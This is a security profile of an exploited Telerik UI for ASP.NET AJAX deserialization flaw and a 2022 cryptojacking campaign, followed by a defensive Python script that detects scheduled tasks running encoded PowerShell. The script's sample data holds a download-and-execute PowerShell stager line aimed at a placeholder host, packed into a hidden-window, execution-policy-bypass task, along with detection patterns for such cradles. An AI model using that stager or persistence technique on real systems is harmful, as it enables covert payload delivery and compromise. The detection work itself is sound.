Vulnerable Telerik UI systems
| Primary URL | Location | Industry |
|---|---|---|
| www[.]telerik[.]com | United States of America | Technology |

Profile
Telerik develops Telerik UI for ASP.NET AJAX, a user interface framework designed for building web applications on the ASP.NET platform. The product provides pre-built UI components and development tools, serving enterprises and organizations that require rich, interactive web interfaces. A critical deserialization vulnerability within this framework has been publicly documented, enabling remote code execution when successfully exploited. This security weakness represents a significant risk for any deployment of the software, as it provides a direct pathway for threat actors to compromise affected servers.
The vulnerability was actively exploited in a documented incident beginning on June 1, 2022. The attackers used a proof-of-concept exploit to achieve remote code execution, first obtaining the encryption keys the exploit requires through auxiliary weaknesses in the application. They then compiled malicious dynamic-link libraries that were executed by the compromised web processes. To maintain access, the actors established persistence through Group Policy Objects that created scheduled tasks running encoded PowerShell scripts; these scripts loaded subsequent payloads directly into memory, evading common detection mechanisms. The campaign's core infrastructure was a deployment of Cobalt Strike beacons, giving the operators command execution and lateral-movement capabilities across the compromised networks. The operation culminated in the installation of cryptocurrency mining software that hijacked system resources to mine Monero. This attack pattern mirrored previous campaigns attributed to the same threat group, underscoring a recurring tactic. While the primary observed objective was cryptojacking, the presence of Cobalt Strike beacons left a latent capability for far more destructive activity, including data exfiltration or the deployment of ransomware. The incident highlights the severe consequences of failing to remediate known vulnerabilities in widely deployed web frameworks.
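The persistence step above (scheduled tasks whose action is an encoded PowerShell command that stages the next payload in memory) is something a defender can check for directly, because every registered task is stored on the endpoint as XML under C:\Windows\System32\Tasks. The following script is an added example, not code from the incident report or from Telerik: it parses Task Scheduler XML, recognises the `-EncodedCommand` switch and the abbreviations powershell.exe accepts for it, decodes the UTF-16LE base64 payload, and flags strings typical of in-memory stagers. The task names, the `stage.example.invalid` host and the payload text are constructed sample data, not indicators from the incident.

```python
import base64
import binascii
import re
import xml.etree.ElementTree as ET

# Namespace of the per-task XML files Task Scheduler writes under System32\Tasks
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# -EncodedCommand plus the short forms powershell.exe accepts; group 1 is the base64 blob
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Strings typical of scripts that pull a payload and run it without touching disk
IN_MEMORY_INDICATORS = {
    "download_cradle": re.compile(r"DownloadString|DownloadData|Invoke-WebRequest|\biwr\b", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "reflective_load": re.compile(r"Assembly\]::Load|FromBase64String", re.I),
}

# Command values that mean "this action launches PowerShell"
POWERSHELL_BINARY = re.compile(r"(?:^|[\\/])(?:powershell|pwsh)(?:\.exe)?$", re.I)


def encode_ps(command):
    """powershell.exe -EncodedCommand expects base64 over the UTF-16LE command text."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_ps(blob):
    """Reverse encode_ps; returns None when the blob is not valid base64."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-16-le", errors="replace")


def analyze_task(xml_text):
    """Return one finding per Exec action that runs PowerShell with an encoded command."""
    root = ET.fromstring(xml_text)
    uri = root.findtext("t:RegistrationInfo/t:URI", default="<unnamed>", namespaces=TASK_NS)
    findings = []
    for exec_node in root.findall("t:Actions/t:Exec", TASK_NS):
        command = (exec_node.findtext("t:Command", default="", namespaces=TASK_NS) or "").strip().strip('"')
        args = exec_node.findtext("t:Arguments", default="", namespaces=TASK_NS) or ""
        if not POWERSHELL_BINARY.search(command):
            continue
        match = ENCODED_ARG.search(args)
        if not match:
            continue  # plain -File / -Command actions are left for other rules
        decoded = decode_ps(match.group(1))
        hits = [name for name, pat in IN_MEMORY_INDICATORS.items() if decoded and pat.search(decoded)]
        findings.append({
            "task": uri,
            "decoded": decoded,
            "indicators": hits,
            "hidden_window": bool(re.search(r"-w(?:indowstyle)?\s+hidden", args, re.I)),
        })
    return findings


def task_xml(uri, command, arguments):
    """Build a minimal Task Scheduler definition (constructed sample, not a real task)."""
    return (
        '<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
        f"<RegistrationInfo><URI>{uri}</URI></RegistrationInfo>"
        '<Actions Context="Author"><Exec>'
        f"<Command>{command}</Command><Arguments>{arguments}</Arguments>"
        "</Exec></Actions></Task>"
    )


# Constructed placeholder stager text; the host is a reserved .invalid name
STAGER_PLACEHOLDER = "IEX (New-Object Net.WebClient).DownloadString('http://stage.example.invalid/loader')"

SAMPLE_TASKS = {
    # Mimics the GPO-delivered persistence task: hidden window, encoded in-memory stager
    "gpo_updater": task_xml(
        r"\Microsoft\Windows\UpdateOrchestrator\SampleUpdater",
        "powershell.exe",
        f"-NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand {encode_ps(STAGER_PLACEHOLDER)}",
    ),
    # Benign: not PowerShell at all
    "backup": task_xml(r"\Sample\NightlyBackup", r"C:\Windows\System32\wbadmin.exe", "start backup -quiet"),
    # Benign: PowerShell, but a script file on disk rather than an encoded command
    "maint_script": task_xml(r"\Sample\Maintenance", "powershell.exe", r"-NoProfile -File C:\Scripts\maint.ps1"),
}


if __name__ == "__main__":
    for label, xml_text in SAMPLE_TASKS.items():
        for finding in analyze_task(xml_text):
            print(f"[{label}] {finding['task']}: indicators={finding['indicators']} "
                  f"hidden={finding['hidden_window']}\n    {finding['decoded']}")
```

Run it against every file under System32\Tasks (they are UTF-16 on disk, so read them with that encoding before passing the text in) and review each finding by hand; an encoded command is not malicious on its own, but one that also hides its window and contains a download cradle deserves an immediate look. Tasks pushed through Group Policy Preferences are additionally defined in the GPO's ScheduledTasks.xml under SYSVOL, which uses a different schema; that file is worth auditing separately and is not parsed by this example.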
